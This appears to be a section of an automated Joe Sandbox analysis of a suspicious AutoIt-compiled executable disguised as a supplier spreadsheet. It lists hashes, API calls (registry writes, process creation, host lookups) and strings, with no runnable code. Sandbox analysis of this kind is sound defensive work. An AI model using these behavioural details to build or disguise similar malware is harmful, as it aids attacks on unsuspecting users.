                                                                                                                  • Opcode ID: 077615ddf973624e916f65be333a6ae2ee7ce8c47d91a78333ce6631dff910e9
                                                                                                                  • Instruction ID: d3f5355477bb463588ed7df7e1d8c0f7ec62f42d017231c6bce1ecfb436f2331
                                                                                                                  • Opcode Fuzzy Hash: 077615ddf973624e916f65be333a6ae2ee7ce8c47d91a78333ce6631dff910e9
                                                                                                                  • Instruction Fuzzy Hash: A2C04CB140410DEFCB15DB80D9859EFB7BDBB04304F204096A155E1100D7709B459F71
                                                                                                                  APIs
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E279
                                                                                                                  • timeGetTime.WINMM ref: 00D7E51A
                                                                                                                  • TranslateMessage.USER32(?), ref: 00D7E646
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D7E651
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E664
                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 00D7E697
                                                                                                                  • DestroyWindow.USER32 ref: 00D7E6A3
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7E6BD
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00DE5B15
                                                                                                                  • TranslateMessage.USER32(?), ref: 00DE62AF
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00DE62BD
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DE62D1
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                  • Opcode ID: 35758fffd59de49753a5392e4048f3b9c70b8937e2b138c458f3ed519f1cefff
                                                                                                                  • Instruction ID: 2fcfd58889860895af37e96b5e2e26392028228c7d61f90879d5ec36afc0a389
                                                                                                                  • Opcode Fuzzy Hash: 35758fffd59de49753a5392e4048f3b9c70b8937e2b138c458f3ed519f1cefff
                                                                                                                  • Instruction Fuzzy Hash: 5F62B470504384DFD724EF25D885BAA77E5FF44308F1889ADE98A9B292E770D844CB72
                                                                                                                  APIs
                                                                                                                  • ___createFile.LIBCMT ref: 00DA6C73
                                                                                                                  • ___createFile.LIBCMT ref: 00DA6CB4
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DA6CDD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA6CE4
                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA6CF7
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DA6D1A
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA6D23
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA6D2C
                                                                                                                  • __set_osfhnd.LIBCMT ref: 00DA6D5C
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6DC6
                                                                                                                  • __close_nolock.LIBCMT ref: 00DA6DEC
                                                                                                                  • __chsize_nolock.LIBCMT ref: 00DA6E1C
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6E2E
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6F26
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6F3B
                                                                                                                  • __close_nolock.LIBCMT ref: 00DA6F9B
                                                                                                                    • Part of subcall function 00D9F84C: CloseHandle.KERNEL32(00000000,00E1EEC4,00000000,?,00DA6DF1,00E1EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D9F89C
                                                                                                                    • Part of subcall function 00D9F84C: GetLastError.KERNEL32(?,00DA6DF1,00E1EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D9F8A6
                                                                                                                    • Part of subcall function 00D9F84C: __free_osfhnd.LIBCMT ref: 00D9F8B3
                                                                                                                    • Part of subcall function 00D9F84C: __dosmaperr.LIBCMT ref: 00D9F8D5
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6FBD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA70F2
                                                                                                                  • ___createFile.LIBCMT ref: 00DA7111
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DA711E
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA7125
                                                                                                                  • __free_osfhnd.LIBCMT ref: 00DA7145
                                                                                                                  • __invoke_watson.LIBCMT ref: 00DA7173
                                                                                                                  • __wsopen_helper.LIBCMT ref: 00DA718D
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3896587723-2766056989
                                                                                                                  • Opcode ID: 7ac0f864f479f3d1f5bc043674ba63e8f9696130fc32a180a9bcb5874c5c3a6f
                                                                                                                  • Instruction ID: c37d2d79f7d4bb18a27f0bfed74735e489ca5ff0e65214e19bacd08302fbaae9
                                                                                                                  • Opcode Fuzzy Hash: 7ac0f864f479f3d1f5bc043674ba63e8f9696130fc32a180a9bcb5874c5c3a6f
                                                                                                                  • Instruction Fuzzy Hash: CC220071904209DBEF259F68DC55BAE7B71EB02320F2C8229E561AB2E1C739CD40D771

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00DB76ED
                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00DB7713
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB7741
                                                                                                                  • _wcscmp.LIBCMT ref: 00DB774C
                                                                                                                  • _wcscat.LIBCMT ref: 00DB7762
                                                                                                                  • _wcsstr.LIBCMT ref: 00DB776D
                                                                                                                  • 755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DB7789
                                                                                                                  • _wcscat.LIBCMT ref: 00DB77D2
                                                                                                                  • _wcscat.LIBCMT ref: 00DB77D9
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DB7804
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 1513093770-1459072770
                                                                                                                  • Opcode ID: 34e3b9e615064cf18937b8d2f356b64b5d3db6c0559bee67e9d459c7e960710c
                                                                                                                  • Instruction ID: 6d883d578eb61b72813e60981dda2af15db94a199047885f781c12c3a578b05b
                                                                                                                  • Opcode Fuzzy Hash: 34e3b9e615064cf18937b8d2f356b64b5d3db6c0559bee67e9d459c7e960710c
                                                                                                                  • Instruction Fuzzy Hash: 4B41D076A04300BBEB01B7649C87EBF7BACEF55710F14005AF801F6182EB649A01DAB1

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • GetForegroundWindow.USER32 ref: 00D71FBE
                                                                                                                  • IsWindow.USER32(?), ref: 00DE282E
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                  • Opcode ID: 167069c086eeda442a525bc8923dbb592c0065dd9ccb19ee355d85c65655acd6
                                                                                                                  • Instruction ID: 48c5b947af8cbaf1b23c69f50bb0f68e45b813daa3624d29f53b288ad836f234
                                                                                                                  • Opcode Fuzzy Hash: 167069c086eeda442a525bc8923dbb592c0065dd9ccb19ee355d85c65655acd6
                                                                                                                  • Instruction Fuzzy Hash: 02D1D970104642EBCB04FF15C881AB9BBB5FF54344F188A2DF499975A1DB30E959CBB2

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD3626
                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,00E0DBF0,00000000,?,00000000,?,?), ref: 00DD3694
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DD36DC
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DD3765
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00DD3A85
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD3A92
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                  • Opcode ID: 435cc1942304d259922af71e77e4cc7b2cfb395425f44d278da59ff4fb57e877
                                                                                                                  • Instruction ID: ce02f48b6f4aa30c364f4a7b9783267a583cb21239b76e357798d244507dc30f
                                                                                                                  • Opcode Fuzzy Hash: 435cc1942304d259922af71e77e4cc7b2cfb395425f44d278da59ff4fb57e877
                                                                                                                  • Instruction Fuzzy Hash: E0026F75604602AFCB14EF24C895E2AB7E5FF89724F04855DF88A9B361DB70ED01CB62

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00000000,00000001,00000000), ref: 00D7428C
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00D91BC7: __wcsicmp_l.LIBCMT ref: 00D91C50
                                                                                                                  • _wcscpy.LIBCMT ref: 00D743C0
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00DE214E
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe$CMDLINE$CMDLINERAW
                                                                                                                  • API String ID: 861526374-2782274033
                                                                                                                  • Opcode ID: 799b46e2f343dc77cbc3cda7a00d91323dfcf565e68caefbc57ef4b78b517d15
                                                                                                                  • Instruction ID: 6762fe7d5d7f30b8d466aa7a1ec69515d3b2619c13681328683efc758237d997
                                                                                                                  • Opcode Fuzzy Hash: 799b46e2f343dc77cbc3cda7a00d91323dfcf565e68caefbc57ef4b78b517d15
                                                                                                                  • Instruction Fuzzy Hash: 05818172900219AACB06EBE4CD56EEF7BBCEF15354F104019E549B7081FB606A49DB72

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D8EA39
                                                                                                                  • __wsplitpath.LIBCMT ref: 00D8EA56
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcsncat.LIBCMT ref: 00D8EA69
                                                                                                                  • __makepath.LIBCMT ref: 00D8EA85
                                                                                                                    • Part of subcall function 00D92BFF: __wmakepath_s.LIBCMT ref: 00D92C13
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • _wcscpy.LIBCMT ref: 00D8EABE
                                                                                                                    • Part of subcall function 00D8EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D8EADA,?,?), ref: 00D8EB27
                                                                                                                  • _wcscat.LIBCMT ref: 00DE32FC
                                                                                                                  • _wcscat.LIBCMT ref: 00DE3334
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DE3370
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                  • String ID: Include$\$"
                                                                                                                  • API String ID: 1213536620-2474423117
                                                                                                                  • Opcode ID: 729673f7c9e7da333e52a720d5bfeea8d7a23cd2448ab7df49e325da2f6f40c4
                                                                                                                  • Instruction ID: dffbb1d549bc03d3a9dfd5a5e50a5c463c966aae2696ee8dea86b9771ced4c85
                                                                                                                  • Opcode Fuzzy Hash: 729673f7c9e7da333e52a720d5bfeea8d7a23cd2448ab7df49e325da2f6f40c4
                                                                                                                  • Instruction Fuzzy Hash: C95191B1404345AFC705EF56EC89CABBBE8FB49300F40451EF685A3261EB749648CB76

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                  • Opcode ID: 43d724a90cf5b8b6a2f4573d5ddef7f2cf60d95d2d581266fc40b738c41346ac
                                                                                                                  • Instruction ID: fcf8c553a1c72db1f21478b87c1154f4542c5821ebb04f83b95f35979b143f4d
                                                                                                                  • Opcode Fuzzy Hash: 43d724a90cf5b8b6a2f4573d5ddef7f2cf60d95d2d581266fc40b738c41346ac
                                                                                                                  • Instruction Fuzzy Hash: 8E11A271A08225EFDF24A7709C4AEEA77ADEB41720F044065F456E6191EE70DA818EB0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D730B0
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00D730BF
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00D730D5
                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00D730E7
                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00D730F9
                                                                                                                    • Part of subcall function 00D7318A: LoadImageW.USER32(00D70000,00000063,00000001,00000010,00000010,00000000), ref: 00D731AE
                                                                                                                  • RegisterClassExW.USER32(?), ref: 00D73167
                                                                                                                    • Part of subcall function 00D72F58: GetSysColorBrush.USER32(0000000F), ref: 00D72F8B
                                                                                                                    • Part of subcall function 00D72F58: RegisterClassExW.USER32(00000030), ref: 00D72FB5
                                                                                                                    • Part of subcall function 00D72F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72FC6
                                                                                                                    • Part of subcall function 00D72F58: LoadIconW.USER32(000000A9), ref: 00D73009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                  • Opcode ID: 9e96bad7eee8c5e445f8e13715e73377061f270bb0ec248184f2b77f9a73f256
                                                                                                                  • Instruction ID: a9086b2d7f1f21438b928f2eed59aef3fdb5ffec8294af4102d1a2a2ec08308a
                                                                                                                  • Opcode Fuzzy Hash: 9e96bad7eee8c5e445f8e13715e73377061f270bb0ec248184f2b77f9a73f256
                                                                                                                  • Instruction Fuzzy Hash: FD212F70D05308AFCB049FAAEC4DA99BFB5EB48310F04816EE618B62A0D7754948DFA1

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB777
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DCB7A4
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCB7AE
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00DCB8AE
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DCB9DB
                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00DCBA0F
                                                                                                                  • CoGetObject.OLE32(?,00000000,00DFD91C,?), ref: 00DCBA32
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00DCBA45
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DCBAC5
                                                                                                                  • VariantClear.OLEAUT32(00DFD91C), ref: 00DCBAD5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2395222682-0
                                                                                                                  • Opcode ID: 9a63c13ec308cf1a61cbd7af98b5194cf9e4e39cba25822b2ed06773e3890396
                                                                                                                  • Instruction ID: 9145d1680e89a8f196ac46fb986cb03923a09fa283c1e8cd7ac4bd48c19fd938
                                                                                                                  • Opcode Fuzzy Hash: 9a63c13ec308cf1a61cbd7af98b5194cf9e4e39cba25822b2ed06773e3890396
                                                                                                                  • Instruction Fuzzy Hash: 9DC10371608306AFC700DF68C885A2AB7EAFF89314F14491DF58ADB251DB71ED05CB62

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D72F8B
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00D72FB5
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72FC6
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00D73009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                  • Opcode ID: dee1c16b1db7e422f4d8a9d2dc9afdd46a603c100ea5f537cc0e16f1c71bb9b4
                                                                                                                  • Instruction ID: 86df3d66c34706ded0a9d949a4066f8468801b8cef2b0b11a27f9a179e54427f
                                                                                                                  • Opcode Fuzzy Hash: dee1c16b1db7e422f4d8a9d2dc9afdd46a603c100ea5f537cc0e16f1c71bb9b4
                                                                                                                  • Instruction Fuzzy Hash: EF21B4B5900318AFDB00AF95E849BDDBFB6FB08700F00815AF615F62A0D7B04548CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD23E6
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DD2579
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DD259D
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DD25DD
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DD25FF
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD2760
                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DD2792
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD27C1
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD2838
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4090791747-0
                                                                                                                  • Opcode ID: 80579e8da3a3165a77648856e92337b31f20b602c608bf75c045a1a6ad0a9ec2
                                                                                                                  • Instruction ID: de37a87d768b96e86cfbdf8bf2c7cd34f4da7ecbc403b9c9eaab1f870863747a
                                                                                                                  • Opcode Fuzzy Hash: 80579e8da3a3165a77648856e92337b31f20b602c608bf75c045a1a6ad0a9ec2
                                                                                                                  • Instruction Fuzzy Hash: 39D17E356043019FCB25EF24D891A6ABBE5EF95314F18845EF8999B3A2DB30DC41CB72

                                                                                                                  Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 0-572801152
                                                                                                                  • Opcode ID: 94489e9a55c928d2079ba07dc6a08bb73bb8c34797393404a41779cdaf644a4e
                                                                                                                  • Instruction ID: caac15fa7b7acfb32cbf395406a35b87620ad90c2916ab58f9a0f9e9f5224d36
                                                                                                                  • Opcode Fuzzy Hash: 94489e9a55c928d2079ba07dc6a08bb73bb8c34797393404a41779cdaf644a4e
                                                                                                                  • Instruction Fuzzy Hash: 72E19F71A1021AABDF10DFA8C985FAE77B5EF48314F18902DEA49AB281D770DD41CB70

                                                                                                                  Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
